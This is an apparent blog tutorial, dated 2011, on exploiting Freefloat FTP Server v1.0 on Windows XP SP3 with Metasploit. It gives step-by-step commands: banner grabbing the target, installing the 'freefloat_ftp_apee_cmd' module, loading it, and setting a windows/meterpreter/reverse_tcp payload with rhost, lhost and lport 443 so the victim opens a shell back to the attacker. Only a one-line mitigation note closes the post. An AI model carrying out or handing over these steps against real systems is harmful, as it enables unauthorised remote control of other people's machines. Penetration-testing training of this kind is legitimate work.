Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP 3
Victim Vulnerable Application : Freefloat FTP Server v1.0
Attacker O.S Backtrack 5 R1
Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)
Another vulnerable application that I found when surfing around from packet storm. In this tutorial also I will try to explain about the simple step by step how to perform an attack with a detailed way using metasploit framework.
1. Metasploit framework
3. Freefloat FTP server v1.0 (download from mediafire.com)
Attacker IP : 192.168.8.93
Victim IP : 192.168.8.91
1. The first step we need to perform some scanning method to know are someone in our network used this vulnerability software or not. Let say I already know that there's a computer have port 21(FTP) opened with IP 192.168.8.91. Then I want to know what software he/she used by performing a simple banner grabbing.
There it is 😛 the vicitm use Freefloat FTP server.
2. Copy the freefloat_ftp_apee_cmd.rb to /pentest/exploits/framework/modules/exploits/remote/ folder.
cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/
3. The next step let's prepare our metasploit console by running msfconsole command and then load the exploit.
msf > use exploit/remote/freefloat_ftp_apee_cmd msf exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
4. There's a few switch you need to set up when using this exploit(see picture below), but if you want to view the whole options, just run show options command.
Informations :set rhost 192.168.8.91 --> set your target IP Address set lhost 192.168.8.93 --> attacker computer IP address set lport 443 --> port of your local computer used to handle the payload
1. Until now when I write this tutorial (11-9-2011) there's still no cure, you can temporarily change to another FTP server application until the developer fix it up.
Hope it's useful 🙂